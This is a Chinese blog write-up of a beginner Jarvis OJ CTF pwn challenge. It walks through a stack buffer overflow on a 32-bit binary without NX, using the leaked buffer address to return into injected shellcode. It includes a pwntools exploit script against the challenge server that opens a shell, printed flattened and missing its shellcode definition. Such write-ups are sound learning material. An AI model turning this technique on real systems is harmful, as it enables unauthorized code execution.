ret2shellcode

 

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

题目是在jarvis OJ上的

记录一次入门pwn题--ret2shellcode Safe 第1张

 

 

 

题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5

一道非常典型的shellcode题,话不多说,直接开整

首先我们还是先要nc一下,看一下出题人给我们整了什么活

记录一次入门pwn题--ret2shellcode Safe 第2张

 

 嗯?给了一个地址,没有其他信息了

 

那么我么用pwntools的checksec查看一下开启了哪些保护,可以看到没有开启NX保护,大致可以猜到可以利用shellcode来获取flag

记录一次入门pwn题--ret2shellcode Safe 第3张

 

根据流程,接下来放到ida里查看伪代码:

发现一个vulnerable_function()  翻译过来就是漏洞函数

记录一次入门pwn题--ret2shellcode Safe 第4张

 

到这里也很容易看出开始nc时得到的内存地址就是buf的地址,所以思路就来了,只要可以获取这段地址,插入shellcode,覆盖掉函数的返回地址,就可以成功pwn掉。

 记录一次入门pwn题--ret2shellcode Safe 第5张

 

 

点开buf,也可以看到buf的大小是0x88+0x04(32位+4 64位+8)

记录一次入门pwn题--ret2shellcode Safe 第6张

 

 记录一次入门pwn题--ret2shellcode Safe 第7张

 

 

 关于为什么是要覆盖掉函数的返回地址,可以看这张图,前提是对函数调用时的栈内变化有所了解。

记录一次入门pwn题--ret2shellcode Safe 第8张

 

如果看不懂的话建议还是先学习一下函数调用栈,推荐教程 https://zhuanlan.zhihu.com/p/25816426  写的很棒,(我也看的不是很懂,一起学吧

 

下面我们来构造exp:

首先分析一下,这个程序是会输出buf的地址的,所以我们要先接受这个地址,这就可以用到我们的pwntools的函数recvuntil()

记录一次入门pwn题--ret2shellcode Safe 第9张

解释一下,开始先把%p之前的多余字符吸收掉,不用管,然后用 索引取值,取出地址(skrskrskr~)

 

 接下来我们构造payload:

shellcode = asm(shellcraft)

payload  = shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(之前获得的地址)

 

 

完整版exp:

from pwn import *
debug = 0 if debug:   a = process('./level1.80eacdcd51aca92af7749d96efad7fb5') else:   a = remote('pwn2.jarvisoj.com',9877) a.recvuntil("What's this:") addr_buf = int(a.recvuntil("?")[:-1],16) payload = shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(addr_buf)
a.sendline(payload) a.interactive()

 

运行脚本:

记录一次入门pwn题--ret2shellcode Safe 第10张

 

 

 记录日期:2020-07-06 21:10:48

 

 

 

 

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄